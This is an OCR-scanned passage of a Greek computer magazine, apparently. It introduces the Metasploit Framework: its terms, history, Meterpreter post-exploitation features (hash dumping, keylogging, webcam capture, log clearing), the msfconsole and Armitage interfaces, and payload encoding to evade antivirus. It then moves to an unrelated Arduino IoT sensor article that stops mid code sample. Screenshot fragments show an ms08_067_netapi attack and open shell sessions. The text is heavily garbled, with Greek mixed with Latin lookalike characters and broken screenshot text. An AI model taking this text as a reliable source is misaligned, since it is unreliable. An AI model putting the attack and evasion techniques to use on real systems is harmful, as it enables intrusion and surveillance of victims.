του, εἶναι γραμμένο στη γλὠσσα Ruby kai, όπως φαίνεται κι ano ro screenshot, 
περιλαμβάνει πάνω ano 1000 exploit modules κι εκατοντάδες payloads. 


σκοπούς. Σχεδὸν πάντα, αυτό nou επιζητἁ εἶναι va εκτελέσει κὠδικα 
--μη εξουσιοδοτηµένα, εννοεἰται--, στο μηχάνημα που «Φιλοξενεί το 
ευπαθὲς λογισμικὀ. Συνηθισμένοι τρόποι για va το πετύχει εἶναι µέσω TOU 
λεγόμενου buffer overflow, κάποιου SQL injection σε web application, µε 
εκμετάλλευση µιας (επιπόλαιας) ρύθμισης σε δικτυακἠ υπηρεσία κ.ο.κ. 
Γενικά, órav γνωρίζουμε τον ακριβἠ λόγο yia τον οποίο το λογισμικό 
εἶναι προβληματικό, τότε λέμε Ori εἶναι vulnerable ως προς ro SQL in- 
jection, To buffer overflow κ.λπ. Τελικά, το σημαντικὀ µε ra exploits 
εἶναι να συνειδητοποιήσουμµε ὁτι αποτελούν τον τρόπο µε τον οποίο ἑνας 
επιτιθέμενος ἐχει την ευκαιρἰα να εκτελέσει μη-εξουσιοδοτημένο κὠδικα 
στο μηχάνημα-στὀχο. 


Payload. O κὠδικας που επιχειρεί ο επιτιθέμενος να εκτελέσει στο 
μηχάνημα-στὀχο, αφού ἐχει βρει Eva ἡ περισσότερα exploits, εἶναι 
auró που στα πλαἰσια rou Metasploit Framework ονομάζεται payload. 
Μια συνηθισμένη karnyopia payloads εἶναι ra reverse shells. Αποστολἠ 
ενός reverse shell εἶναι va τρέξει στο μηχάνημα-στὀχο και va συνδεθεὶ 
στο μηχάνημα rou επιτιθέµενου, παρἑχοντάς του Eva πλήρες κέλυφος 
εντολών (command shell) στον ióio το στόχο. Του δίνει, μ’ ἄλλα λόγια, 
πλήρη πρὀσβαση στον στὀχο µέσω ενός παραθύρου γραμμἠὴς εντολών (full 
command line access). Προσέξτε εδώ OTI Eva payload δεν προσφέρει κατ΄ 
ανάγκη απομακρυσμένη πρὀσβαση στον επιτιθέµενο. Κάλλιστα unopsi 
να ΄ναι και κάτι απλούστερο, ὁπως, N.X., µια αλληλουχία εντολών nou θα 
εκτελεστεὶ µία μόνο φορὰ και θα χει ως αποτέλεσµα την προσθήκη Evoc 
νέου λογαριασμού χρήστη. 
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Module. H δύναμη rou Metasploit Framework ἐγκειται στη χρήση 
μικρῶν, αυτόνομων οντοτήτων λογισμικού: πρὀκειται yia τα λεγόμενα 
modules. Υπάρχουν διάφορα eidn modules. Όταν, n.x., ο επιτιθέμενος 
θέλει να σκανἀρει το τοπικὀ δίκτυο για ευπαθείς υπηρεσίες, τότε ἐχει τη 
δυνατότητα να χρησιμοποιήσει κάποιο auxiliary module. Ας γίνουμε λίγο 
πιο συγκεκριμένοι KI GG υποθέσουμε ότι ο attacker ψάχνει για ευπάθειες σε 
SSH servers. Το πρώτο πράγμα που οφείλει να κάνει εἶναι να διαπιστώσει 
αν ὀντως υπάρχουν ενεργὲς υπηρεσίες SSH στο δίκτυο, καθώς και ποια 
εἶναι η ἐκδοση καθεμιάς. Για τη δουλειά αυτἠ θα μπορούσε να καταφύγει 
σε Evav network scanner, ὁπως εἶναι το nmap. Με τα εργαλεἰα rou εἶδους 
όμως υπάρχει Eva μικρὸ πρόβλημα: Αν δεν χρησιμοποιηθούν σωστὰ, 
τότε προκαλούν πολύ «θόρυβο» στο δίκτυο. Ἔτσι, εἶναι πιθανὀ va 
χτυπήσει OUVAYEPHOS ano κάποιο IDS (Intrusion Detection System) και 
το μηχάνημα του επιτιθέµενου να µπλοκαριστεἰ aNd περαιτέρω απὀπειρες 
για σύνδεση ἡ σάρωση. Αυτό λοιπὸν που μπορεί να κάνει o attacker εἶναι 
µια στοχευμένη σάρωση, χρησιμοποιώντας Eva auxiliary module: το ssh_ 
version, ano την υποκατηγορία scanner/ssh. Ας περάσουμε και σ’ Eva 
ἆλλο παράδειγμα. O attacker µας, λοιπὀν, ἐχει ropa βρει ὁτι στο δίκτυο 
υπάρχουν κάποια Windows boxes µε ro file sharing ενεργοποιημένο. 
Θέλει να δοκιμάσει αν εἶναι exploitable, επομένως θα δοκιμάσει μερικά 
exploit modules. ‘Eva ano αυτά εἶναι το δημοφιλὲς πι508 067 netapi, 
ano την υποκατηγορἰα windows/smb. Αξίζει εδώ να σημειώσουμε ὁτι το 
συγκεκριµένο exploit module εἶναι το αγαπημένο όσων επιδεικνύουν τις 
δυνατότητες rou Metasploit Framework. Πράγματι, εἶναι καλογραμμένο 
και δοκιμασμένο µε επιτυχία, ειδικἁ σε Windows ΧΡ boxes που, ακόµη και 
σήμερα, συναντάμε σε εταιρείες, οργανισμούς, εργαστἠρια κ.ο.κ. 


Listener. Πρόκειται yia µια λειτουργία rou Metasploit που χειρίζεται τις 
συνδέσεις ano ra μηχανήματα-στόχους. Σε κἄποιο εξ αυτών οεπιτιθέµενος 
ενδέχεται να χει στείλει Eva payload, το οποίο, órav εκτελεστεἰ, θα 
επιχειρήσει va συνδεθεὶ µε τον υπολογιστή του επιτιθἐµενου. E, για va 
εγκαθιδρυθεί το σχετικό κανάλι επικοινωνίας μεταξύ attacker και victim, 
ο listener rou Metaploit πρέπει va ‘val ενεργοποιηµμένος και να περιμένει 
για εισερχόµενες συνδέσεις. 


H γένηση και η εξέλιξη του Metasploit 


O πρωτεργάτης rou Metasploit κι ο ἄνθρωπος που συνέλαβε την όλη 
ιδέα εἶναι o HD Moore (www.linkedin.com/in/hdmoore). Όταν o Moore 
εργαζόταν ως avaAurr|s σε εταιρεία ασφαλείας, στις ευθύνες rou ἦταν 
η αξιολόγηση κὠδικα για exploits που κυκλοφορούσε εδώ κι EkEi στο 
Internet. Κάποια στιγµἠ ο Moore ἀρχισε να εργάζεται πάνω σε µια 
πλατφόρμα για τη δημιουργία κι ανάπτυξη exploits. Το 2003 ἐδωσε 
στο ευρύ κοινὸ την πρώτη ἐκδοση rou Metasploit, το οποίο ἦταν 
γραμμένο στη γλὠσσα προγραμματισμού Perl και περιελάμβανε 11 
μόλις exploits. Το 2004 κυκλοφόρησε η ἐκδοση 2.0 rou Metasploit, 
µε 19 exploits και τουλάχιστον 27 διαφορετικἁ payloads. Στο μεταξύ 
o Moore δεν δούλευε πια μόνος, ενώ το Metasploit eixe κερδίσει την 
προσοχἠ της κοινότητας των ερευνητών ασφαλείας και θεωρούταν ως 
va ano τα απαραίτητα εργαλεία για κάθε penetration tester. Το 2007 
κυκλοφόρησε n ἐκδοση 3.0 rou Metasploit Framework, γραμμένη 
εξ ολοκλήρου ano rnv αρχή στη γλὠσσα Ruby. Το φθινόπωρο του 
2009 το Metasploit αγοράστηκε ano την εταιρεία Rapid7 (www.rapid7. 
com). Πλέον, o Moore και η ομάδα του μπορούσαν να αφιερώσουν 
το 100% του χρόνου τους στην ανάπτυξη Tou Metasploit. Η Rapid7 
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O πανίσχυρος Meterpreter 


Ano τη στιγµἠ nou ἐχει εντοπιστεἰ µια ευπάθεια σ΄’ Eva σύστημα κι O 
επιτιθέμενος την ἐχει εκμεταλλευτεί επιτυχώς, περνάει τότε στη φάση 
του λεγόμενου post exploitation. Πλέον, auró nou τον απασχολεἰ δεν 
εἶναι το πὼς θα αποκτήσει πρόσβαση, αλλά το τι θα κάνει ropa που 
την έχει. Εἶναι επίσης λογικό να rov ενδιαφἑρει να τη διατηρήσει Ooo 
περισσότερο γίνεται, π.χ., ακόµη και µετά ano επανεκκίνηση. Επιπλέον, 
πιθανώς ν΄ αρχίσει να ψάχνει και τρόπους ὥστε, µε εφαλτήριο το τρέχον 
μηχάνημα, να αποκτήσει πρόσβαση και σ’ άλλα (pivoting), τα οποία 
ενδεχομένως βρίσκονται ακόµη και σε διαφορετικά δίκτυα. 


Για εργασίες σαν τις προαναφερθείσες υπάρχει Eva εξέχον payload 
στο Metasploit: ο λεγόμενος Meterpreter. Χάρη στον Meterpreter, o 
επιτιθέµενος αποκτά Eva ευέλικτο command shell oro µηχάνηµα-στόχο 
και μπορεἰ πλέον va το εκμεταλλευτεί περαιτέρω, να καλύψει τα ἴχνη του 
ἡ va εφορμἠήσει σε ἄλλους υπολογιστές. 


corei3pc 
* root@bi 


it View Terminal Help 


windows/smb/ms¢ 5 tapi 
exploit (ms®8_067_netapi) > RHOST 192.168.56.139 


8 067 netapi) > e 
er 
cting the tar 


XP Servi 
P2 


Fi e 3:4 -> 192 39:1232) at 2 2 21:13:59 +0200 


.1.2600] 
ft Corp 


f,10*C 2114 


Ένα δηµοφιλέστατο exploit module Tou Metasploit εἶναι To 
ms08 067 netapi, ano την υποκατηγορία windows/smb. Εἶναι το αγαπημένο 
όσων επιδεικνύουν τις δυνατότητες rou Framework. Πράγματι, εἶναι 
καλογραμμένο και δοκιμασμἑνο µε επιτυχία, ειδικά σε Windows ΧΡ boxes 
που, ακόµη και σήμερα, συναντάμε σε εταιρείες, οργανισμούς, εργαστήρια 
κ.ο.κ. ΣΤΟ screenshot φαίνεται πόσο εὐκολα αποκτάἆµε shell access o’ Eva 
ευπαθές Windows ΧΡ SP2 box, χάρη στο ms08. 067 netapi. 
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O Meterpreter eivai πολύτιµοςγιατον attacker. Ma va unv αοριστολογούμε, 
δείτε μερικὲς απὀ τις δυνατότητες που παρέχει. 


αναβάθμιση δικαιωμάτων (privilege escalation) 

λήψη rov user hashes anó τη SAM database των Windows 
αποθήκευση screenshots ano To dekstop του θύματος 
ηχογράφηση ano το µικρὀφωνο του συστήματος 
φωτογράφηση του περιβάλλοντα χώρου, ano τη web camera 
καταγραφἠ της πληκτρολόγησης του θύματος (keystroke logging) 
καθαρισμός του event log (κἀλυψη ιχνών) 

απομακρυσμένη εκτέλεση εντολών 

εντοπισμὸς όλων των ενεργών διεργασιών και προγραμμάτων 
τερματισμὸς διεργασιών 

λήψη κι ανέβασμα αρχείων 

επισκόπηση των ενεργών δικτυακών συνδέσεων TOU στὀχου 
επισκόπηση και μεταβολὴ rou routing table 


Εἶναι νοµἰζουµε προφανὲς ὁτι κατά την ενασχόλησή µας µε το Metasploit, 
ο Meterpreter εἶναι ἑνας ano τους φίλους nou θα θἐλουµε να κάνουμε. 


Ενδιάμεσα χρήσης (user interfaces) 


Ano τα προηγούμενα ἐχει γίνει φανερὀ ὁτι ro Metasploit Framework 
παρέχει δυνατότητες εντοπισμού ευπαθειών, εκμετἀλλευσής τους, 
εξαπὀόλυσης επιθέσεων και μετέπειτα διαχεἰρισής τους. Προφανώς, 
όλα αυτά γίνονται µέσω κάποιου περιβάλλοντος χρήσης. To Metasploit 
προσφέρει στον penetration tester περισσότερα απὀ Eva. 


msfconsole 


Av παρομοιάσουµε ro Metasploit Framework µε To Linux, 
τότε TO Msfconsole εἶναι το BASH shell. Με άλλα λόγια, 
πρόκειται yia éva περιβάλλον γραμμής εντολὠν μέσα anó 
το οποίο εργαζὀµαστε µε το Framework: Βρίσκουμε exploits, 
επιλέγουμε payloads, σηκώνουμε listeners, σκανάρουμε το 
δίκτυο, εξαπολύουµε μαζικὲς επιθέσεις κ.ο.κ. Δεν θα ἦταν 
καθόλου υπερβολή αν σημειώναμε πως ὁταν κάποιος λέει 
ὁτι μαθαίνει το Metasploit, εἶναι σαν να λέει ὁτι μαθαίνει 
να χειρίζεται το Msfconsole. Μέσα an’ αυτὸ δουλεύουμε κι 
εμείς, κατὰ τις επιθέσεις που εξαπολύουμε στο άρθρο που 
αρχίζει ano τη σελἰδα 82. 


msfcli 


Χρησιμοποιείται απὸ τη γραμμὴ εντολὠν του εκάστοτε 
λειτουργικού συστήματος, κάτω ano το οποίο τρέχει το 
Metasploit. Με το msfcli μπορούμε να κάνουμε δουλειὲς 
που θα κάναμε και µέσα ano το msfconsole, αλλά ὀχι 
διαδραστικἀ (non-interactively). Αντίθετα, το εργαλείο 
εἶναι καταλληλότερο για scripting, ενώ εἶναι ὀ,τι πρέπει 
κι όταν ξέρουμε ακριβώς ποιο exploit module θέλουμε να 
χρησιμοποιήσουμε για ἐναν συγκεκριµένο στόχο. Όπως 
συμβαίνει µε πολλά εργαλεία του Unix, ἐτσι και το msf- 
cli µπορεί va δεχτεἰ την εἰσοδο ἄλλου εργαλείου ἠ/και va 
ανακατευθύνει τη δικἠ του. 
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Armitage 


Πρόκειται για éva δωρεάν front-end γραφικὠν για TO 
Metasploit, που δημιούργησε o Raphael Mudge. Πα κάποιον 
o οποίος ropa αρχίζει v' ασχολεἰται µε ro penetration test- 
ing, To Armitage εἶναι εντυπωσιακὀ αλλά την ἴδια στιγµή 
µπορεί ν΄ αποδειχθεἰ παραπλανητικὀ: Πράγματι, εἶναι nigavó 
να τον οδηγἠσει στο εσφαλμένο συμπέρασμα OT! υπάρχουν 
εργαλεία που μετατρέπουν ro penetration testing σε παιχνίδι 
shoot-em-up, του στιλ «επιλέγω στὀχο και πυροβολώ». Σε 
πολύ συγκεκριμένα σενάρια, ro penetration testing µε το 
Armitage πράγματι μοιάζει µε παιχνἰδι. Όμως σε αληθινές 
συνθήκες το penetration testing εἶναι αρκετά nio περίπλοκη 
υπόθεση. Επίσης, δεν ἐχει κανένα απολύτως νόημα v’ 
αρχίσει κάποιος την ενασχὀλησή του µε το Armitage, av 
πρὠτα δεν ἐχει κατανοήσει και δουλέψει µε το Metasploit. 
Ano την ἄλλη, αν ξέρει πού βρίσκεται και πού nará, τότε 
το Armitage θα του φανεί ιδιαίτερα χρήσιμο. Ειδικά μάλιστα 
όταν συμμετέχει σε κάποια ομάδα, ὀπου στα πλαίσια µιας 
συγκεκριμένης αποστολἠς διαφορετικἁ µέλη αναλαμβάνουν 
διαφορετικούς ρόλους κι ευθύνες. 
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Ν Applications Places syste 


To Armitage εἶναι 
éva δωρεάν front- 
end γραφικών για 
το Metasploit, που 
δημιούργησε o 
Raphael Mudge. 
[ia κάποιον που 
τώρα ξεκινά µε TO 
penetration test- 
ing το Armitage 
εἶναι εντυπωσιακὀ, 
αλλά την ἴδια 
στιγμή µπορεί 

ν΄ αποδειχθεί 
παραπλανητικὀ: 
Πράγματι, εἶναι 
πιθανὀ va Tov 
οδηγήσει στο 
εσφαλμένο 
συμπέρασμα ὁτι 
υπάρχουν εργαλεία 
που μετατρέπουν 
το penetration 
testing σε παιχνίδι 
shoot-em-up... 


C satreb 9, 14:48 $ 


* Armitage 


Armitage View Hosts Attacks Workspaces Help 


» @ auxiliary 
» (iij exploit 
* (lij payload 
* [lij post 


SECDESK 


Console X | Import x [ Hail Mary. χ] 


1) Finding exploits 


2) Sorting Exploits 


3) Launching Exploi 


4) Listing sessions 


sf > sessions -v 


ive sessions 


Id Type 


1 shell unix 


(via local magic) 
ound 313 exploits 


Found 8 exploits 
Found 348 exploits 


ts 


Information Connection 


192. 56.133:35820 -> 192.168.56.138:6200 (192.168.56.138) 


exploit/unix/ftp/vsftpd 234 backdoor 


2 shell unix 


192.168.56. 19978 (192.168. 


exploit/unix/irc/unreal ircd 3281 backdoor 


shell unix 
4 shell unix 
5  meterpreter x 


192.168.56. i 
192. 7073 -> 192. 168.56. 138 
86/win32 NT AUTHORITY\SYSTEM @ SECDESK 192. . 985 -> 192. 168.56. 


exploit/windows/smb/ms08 067 netapi 


msf > 
TW ©) rootGbt: ~ 


exploit/multi/samba/usermap script 
exploit/multi/samba/usermap script 
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Χρήσιμα εργαλεία 


To Metasploit Framework πλαισιώνουν μερικὰ χρήσιμα, αυτόνομα 
εργαλεία. 


Με τη βοἠθειἁ rou παράγουµε shellcode ἡ αυτόνομα 
εκτελέσιμα, για επιθέσεις που πραγματοποιούνται εκτὸς 
TOU Metasploit. Με τον ὁρο shellcode αναφερόμαστε σ’ 
ἑνα σύνολο εντολὠν που χρησιμεύουν ως payload κατὰ τη 
διάρκεια µιας επίθεσης και δίνουν στον attacker Eva κέλυφος 
εντολών ἡ Eva Meterpreter shell. Υποθέστε, για παράδειγµα, 
ὁτι ο penetration tester έχει καταγράψει τις εκδόσεις των 
web browsers που χρησιμοποιούν τα υποψήφια θὐματά του, 
ενώ ταυτόχρονα γνωρίζει ὁτι κἄποιοι and τους web browsers 
έχουν πολύ συγκεκριμένες ευπάθειες. Τότε, καταφεύγοντας 
στο msfpayload εἶναι σε θέση να παράξει shellcode σε JavaS- 
cript, va το εισαγάγει σε µια ιστοσελίδα και µε TEXVIKEG social 
engineering να κάνει ra θύματά του να την επισκεφθούν. H 
πράξη και μόνο της επίσκεψης θα προκαλέσει την εκτέλεση 
του shellcode σε JavaScript, γεγονὸς που θα σημάνει την 
εκμετάλλευση της ευπάθειας του browser κι Eva ωραιότατο 
command shell για τον penetration tester. 


msfpayload 


O κὠδικας που παράγει το msfpayload εἶναι πολὺ πιθανὀ va 
evToniotei ano κἀποιο σύστημα IDS ἠ/και antivirus. ‘Eva ἄλλο 
θέμα αφορά στους «κενούς» χαρακτήρες (null characters) 
που συχνὰ περιλαμβάνονται στον κὠδικα του msfpayload: 
Ενδεχομένως να θεωρηθούν ως χαρακτήρες τέλους γραμμής 
ano ορισμένους διερμηνευτὲς (interpreters), µε συνέπεια o 
κώδικας να µην εκτελεἰται σωστά. Πα τα προβλήματα αυτά 
υπάρχει το msfencode, το οποίο εξαλείφει τους null charac- 
ters και ταυτόχρονα αναδιαμορφώνει τον κὠδικα µε βάση 
κάποιον encoder, ὥστε να µην εἶναι (εὐκολα) ανιχνεύσιµος 
απὀ IDS κι antivirus. 


msfencode 


Πρὀκειται yia Eva βολικὀ εργαλείο «δύο σ΄ Eva», που απλά 
συνδυάζει τα msfpayload και msfencode. 


msfvenom 


Τι ακολουθεί 


Εἰδαμε τι εἶναι To penetration testing, παρουσιάσαµε και To Metasploit 
Framework. Μετά και το ξεκαθάρισμα ορισμένων βασικὠν ὀρων κι 
εννοιών που το αφορούν, πιστεύουμε OTI ἐχει έρθει η opa για δράση, 
μέσα ano συγκεκριµένα παραδείγματα κι επιδείξεις. Το Metasploit Frame- 
work εἶναι στη διἀθεσή µας για παιχνίδι κι εξερεύνηση και πιστεύουμε 
ὁτι δεν υπάρχει καλύτερος τρόπος για να μάθει κανεὶς κάτι. Γυρίστε στη 
σελίδα 82. 
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Από τους encoders που δέχεται ro msfencode, o shikata ga nai εἶναι o uovaóikóc µε rov χαρακτηρισμό 
"excellent". Πάντως ακόµη και µε την επιστρἀτευσή του, Eva σύγχρονο antivirus εἶναι πολύ πιθανό v’ 
αναγνωρίσει éva payload που προέρχεται ano τη συνεργασία msfpayload kai msfencode. Μολαταύτα 

υπάρχουν τεχνικές για το κρύψιμο encoded payloads μέσα σε άλλα executables, µε τρόπο WOTE TO VEO 

αρχείο να περνά απαρατήρητο ano προγράµµατα antivirus. 
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INTERNET 
THINGS 


pe tro Arduino! 


by G4 dnnouG 


Εικόνα 1 

To «Internet of 
Things Printer» 
εἶναι ἑνας εκτυπω- 
τής που συνδέεται 
στο Internet. Με 
το πάτημα ενός 
κουμπιού τυπώνει 
όλα τα τελευταία 
νέα και τις ενη- 
μερώσεις απὀ τα 
κοινωνικἁ δίκτυα 
του χρήστη. Α, 
σημειώστε ότι 
στηρίζεται σε ἑνα 
Arduino! 
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Σκεφτεἰτε µια NAEKTPOVIKN συσκευἠ που χρησιμοποιείτε, εσείς, σε καθη- 
μερινἠ βάση. Φανταστείτε ropa το ενδεχόμενο αυτή η συσκευἠ va εἰχε 
πρόσβαση στο Internet. Υποθέστε την παρουσία ενὸς κεντρικού κόμβου 
στο Internet, στον οποίο συχνάζουν όλες αυτὲς οι NAEKTPOVIKEG συσκευὲς 
κι αποθηκεύουν ἡ ανταλλάσσουν δεδομένα. E, λοιπὀν, av χωρέσατε στη 
σκέψη σας όλα αυτά, μόλις καταφέρατε va συλλάβετε την ιδέα πίσω ano 
το Internet of Things (IoT). To Internet of Things θέλει κάθε αντικείµενο 
της ζωἠς µας να εἶναι συνδεδεμένο και oro Internet, να αποθηκεύει εκεὶ 
τα δεδοµένα του και να αντλεἰ εκεἰνα που αποθηκεύουν ἄλλες συσκευὲς, 
ὡστε να λειτουργεὶ πιο ἐξυπνα. Σκεφτείτε για παράδειγµα µια ζυγαριά µε 
WiFi, η οποία ανταλλάσσει δεδοµένα µε το ψυγείο µας και αξιοποιεί µια 
δικτυακἠ υπηρεσία σχετικἠ µε τη διατροφή, ὡστε κάθε πρωΐ va µας npo- 
τείνει Eva ελαφρύ γεύμα κι ὀχι αυγά µε µπέικον που τρώμε τα τελευταἰα 
25 χρόνια. Αν νομίζετε πως OAO αυτὀ εἶναι βγαλμένο and τη φαντασία 
του γράφοντα, κάνετε λάθος! Φυσικἀ, το σύστημα που περιγράψαμε θα 
απαιτούσε πολύ χρόνο, αρκετὲς γνώσεις κι ἑνα μεγάλο χρηματικὀ nooo 
για να υλοποιηθεί. Εμείς ὁμως μπορούμε va στραφούμε σε κάτι πιο npo- 
OITO και κυρίως γνώριμο: Στο Arduino! Εδὠ που τα λέμε, το Arduino εἶναι 
αυτό που βοήθησε τους hackers (ñ 
σωστότερα, makers) va δηµιουρ- 
ynoouv και να σχηματίσουν αυτό 
που ονομάζεται τώρα Internet of 
Things. Σε auró το άρθρο θα δημι- 
ουργήσουμε Eva σύστημα το οποίο 
θα συλλέγει πληροφορίες ano το 
περιβάλλον µας, αυτόματα. Αυτὲς 
οι πληροφορίες θα συγκεντρώνο- 
νται σε κάποια δικτυακή υπηρεσία 
κι ano εκεἰ θα μπορούμε αργότερα 
να τις παρακολουθούμε ἡ να τις 
αξιοποιούμε, µε κάποια ἄλλη ou- 
σκευὴ! Το σύστημα που θα φτιά- 
ἔουμε θα πραγματοποιεί μερικὲς 
βασικὲς μετρήσεις και θα φροντίζει 
για την αποστολἠ τους στο Oikruo. 
Θα φροντίσουμε επίσης ώστε va 
έχει αρκετά περιθώρια για περαιτὲ- 
ρω εξέλιξη... 


H γενικἠ ιδέα 


H συλλογή των δεδομένων θα πραγματοποιείται and το Arduino, µε τη 
βοήθεια ενὸς κατάλληλου αισθητήρα. Συγκεκριµένα, το σύστημά µας θα 
μετράει τη θερμοκρασία και την υγρασία του περιβάλλοντος χώρου. Στη 
συνέχεια, µε τη συνδρομὴ ενὸς Ethernet shield οι μετρήσεις θα ano- 
στἐλλονται στο Internet και yia την ακρἰβεια θα καταλήγουν στην unn- 
peoia Cosm. H εν λὀγω υπηρεσία επιτρέπει την οργανωμένη αποθήκευ- 
ση αριθμητικών δεδομένων, ὁπως επίσης την ὀμορφη παρουσἰασἡ τους 
µε γραφικὲς παραστάσεις και τη στατιστικἠ επεξεργασία τους. Φυσικά, 
μέσω του API του Cosm μπορεί κανεὶς να αντλήσει τα αποθηκευμένα 
δεδοµένα και va τα αξιοποιήσει σε κἀποιο ἆλλο project! Με λίγα Aó- 
για, το Cosm εἰναι κάτι σαν Eva δημόσιο αποθετἠριο (public repository) 
για διάφορα εἴδη δεδομένων:. Επομένως, πριν ξεκινήσουμε την κατα- 


1. Μπορούμε ελεύθερα να χρησιμοποιήσουμε δεδοµένα απὀ οποιοδήποτε χρήστη του Cosm! Τίποτα δεν µας 
περιορίζει στα δικἁ µας δεδομένα και μόνον σ’ αυτά, 


Internet of Things µε το Arduino! 
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σκευἠ θα rjrav καλὸ va δημιουργήσουμε Eva λογαριασµὀ στο Cosm 
(https://cosm.com). Κάθε λογαριασμὸς σε aurr| την υπηρεσία µπορεί va 
χρησιμοποιείται and πολλὲς συσκευὲς και κατ’ αυτὸν τον τρὀπο να ou- 
γκεντρώνει δεδομένα απὀ πολλὲς πηγὲς — τα λεγόμενα feeds. Κάθε feed 
µπορεί να περιλαμβάνει πολλών ειδών δεδομένα και κάθε εἶδος αποτελεἰ 
το επονομαζόμενο datastream. Πα παράδειγµα, σε Evav λογαριασμὀ του 
Cosm θα μπορούσαμε να δημιουργήσουμε Eva feed µε το ὀνομα Home 
κι ἑνα ακόμα µε TO ὀνομα Lab, καθένα ano τα οποία θα περιλαμβάνει 
μετρήσεις ano τον αντίστοιχο χώρο. Στη συνέχεια, θα μπορούσαμε va 
ορίσουμε 5 datastream yia ro Home, pE TIG θερμοκρασίες κάθε δωματίου, 
καθώς και 2 datastream για το Lab, µε τη θερμοκρασία και την υγρασία 
στο εργαστήριο. Πα την opa, πάντως, αρκεὶ να φτιάξουμε vav απλὀ ào- 
γαριασμὀ στο Cosm και να εξοικειωθούµε µε το περιβάλλον του. Μετά απ΄ 
αυτό, σειρἁ ἐχει το Arduino, η σύνδεση µε τον αισθητήρα — και φυσικά 
με το Internet. 


H ὦρα rou Arduino 


Ὅπως αναφέραμε προηγουμένως θα χρειαστούμε To Ethernet shield 
(http://arduino.cc/en/Main/ArduinoEthernetShield) ἡ, ακόµα πιο απλά, το 
Arduino Ethernet (http://arduino.cc/en/Main/ArduinoBoardEthernet), TO 
οποίο συνδυάζει τη λειτουργικότητα ενὸς Arduino κι ενὸς Ethernet shield 
σε uia πλακέτα. Εμεὶς πάντως χρησιμοποιήσαμµε ro Ethernet shield κι ¿va 
anAó Arduino. Όπως αντιλαμβάνεστε, ro Ethernet shield εἶναι anapaitn- 
το γιατί θέλουμε η αποστολἠ των δεδομένων να πραγματοποιείται κατευ- 
θείαν ano ro Arduino και χωρίς τη μεσολάβηση ενὸς υπολογιστή. Έτσι, το 
μόνο που θα χρειαστούμε για τη λειτουργία ολόκληρου του συστήματος 
εἶναι µια ελεύθερη θύρα στο ρουτεράκι µας. 
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Εικόνα 2 

Εν αρχή ἦταν το 
Pachube, ro οποίο 
αγοράστηκε απὀ το 
LogMeIn. Το Cosm 
αποτελεί σήμερα 
τη μεγαλύτερη 
βάση δεδομένων 
για αισθητήρες 
χρηστών! Πάνω 
του θα βασιστούμε 
κι εμείς... 


Εικόνα 3 

Το κὐκλωμά µας 
θα αποτελείται ano 
ένα Arduino ki ἑνα 
Ethernet shield. O 
λόγος που αποφα- 
σίσαµε να χρησι- 
μοποιήσουμε το εν 
λόγω shield κι ὀχι 
τον υπολογιστή, 
είναι γιστί θέλουμε 
η συσκευή µας να 
είναι αυτόνομη και 
να συνδέεται µόνι- 
μα µε το Cosm. 


Εικόνα 4 
Θα μπορούσαμε 0a 
χρησιμοποιήσου- 
µε και το Arduino 
Ethernet: Mia εκ- 
δοχή Tou Arduino 
µε ενσωµατωμέ- 
vr υποστήριξη 
Ethernet! Όμως 
η εν λόγω εκδοχἠ 
rou Arduino εἶναι 
μάλλον εξεζητη- 
μένη. H δουλειά 
µας µπορεί να γίνει 
εξίσου καλά µε το 
κλασσικὀ Arduino 
και το Ethernet 
shield. p 
ς 
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Οι μετρήσεις θερμοκρασίας και 
υγρασίας θα πραγματοποιούνται 
μέσω του αισθητήρα DHT11, τον 
οποίο μπορούμε va προµηθευ- 
τούμε and πολλά ηλεκτρονικἁ 
καταστήματα ἡ κι απὀ το παλιὀ, 
καλὸ eBay. Αυτή τη στιγμὴ η τιµή 
του φτάνει μόλις το 1,5 δολάριο. 
Πα τη σωστή επικοινωνία του µε 
το Arduino θα χρειαστούμε μόνο 
μια αντίσταση των 10KQ (καφέ- 
μαύρο-πορτοκαλί). H σύνδεση των 
εξαρτημάτων εἶναι αρκετά απλή. 
Κατ’ αρχάς, συνδέουµε ro Ethernet 
shield oro Arduino. O αισθητήρας 
DHT11 ἐχει τέσσερα pin. To πρὠτο 
ano αριστερά (δείτε την εικόνα 5) 
εἶναι To VCC pin, ο ακροδέκτης τροφοδοσίας δηλαδή, και γι’ αυτὀ θα Tov 
συνδέσουµε απευθείας στα 5V του Arduino board. To επὀµενο pin εἶναι To 
DATA pin, µέσω του οποίου γίνεται η επικοινωνία µε ro Arduino. Αυτό 0a 
συνδεθεὶ µε ro pin 2 του Arduino. Το τρίτο pin θα παραμείνει στον αἐρα 
αφού δεν χρησιµοποιείται, ενώ το τέταρτο θα χρειαστεί να το συνδέσου- 
µε pe To GND rou Arduino board. Τέλος, η αντίσταση που προαναφέραμε 
συνδέεται στους ακροδέκτες 1 και 3 (VCC kai DATA) rou αισθητἠρα µας 
(DHT11). Αυτό ἠταν! Το κὐκλωμὰ µας εἶναι ἑτοιμο. 


Προετοιμασία και µια δοκιµἠ 


Σας προειδοποιούµε: To πρὀγραμμἁ µας θα χρησιμοποιήσει τρεις βιβλι- 
οθήκες. H uia ano αυτές διευκολύνει την επικοινωνία rou Arduino µε 
το Ethernet shield µέσω SPI, η ἄλλη φροντίζει για την επικοινωνία του 
Arduino µε To Cosm, ενώ η τρίτη αναλαμβάνει την επικοινωνἰα µε τον αι- 
σθητἠρα µας. Μπορείτε να τις κατεβάσετε απὀ τις παρακάτω τοποθεσἰες: 


https://github.com/amcewen/HttpClient 
https://github.com/cosm/cosm-arduino 
https://github.com/adafruit/DHT-sensor-library 


Ano καθεμία εξ αυτών θα πάρετε 
ἑνα πακέτο ZIP (κάντε κλικ στο 
ομώνυμο κουμπάκι). Καθένα θα 
Πρέπει να TO αποσυμπιέσετε και 
να αντιγράψετε τα περιεχόμενά 
του μέσα στον κατάλογο library, 
εκεἰ ὀπου εἶναι εγκατεστημένο το 
Arduino IDE. 


Αφού προστεθούν oi βιβλιοθήκες, 
μπορούμε να κάνουμε την πρώτη 
μας δοκιμή για va σιγουρευτού- 
µε πως ο αισθητήρας λειτουργεί 
κανονικἀ. Αρχικά λοιπὸν ξεκινάμε 
το Arduino IDE, πηγαίνουμε στο 
μενού File και συγκεκριµένα στα 
ενσωματωμένα παραδείγματα 
(Examples). Exei θα βρούμε va 


Internet of Things µε το Arduino! 
ri 


«example sketch», nou προστέθηκε μαζὶ µε τη βιβλιοθήκη rou αισθη- 
τήρα. Αφού ro φορτώσουμε, ψάχνουμε στην αρχἡ TOU κὠδικα για τις 
ακόλουθες γραμμές: 


DHT11 pins 


// Uncomment whatever type you're using! we 


//#define DHTTYPE DHT11 // DHT 11 
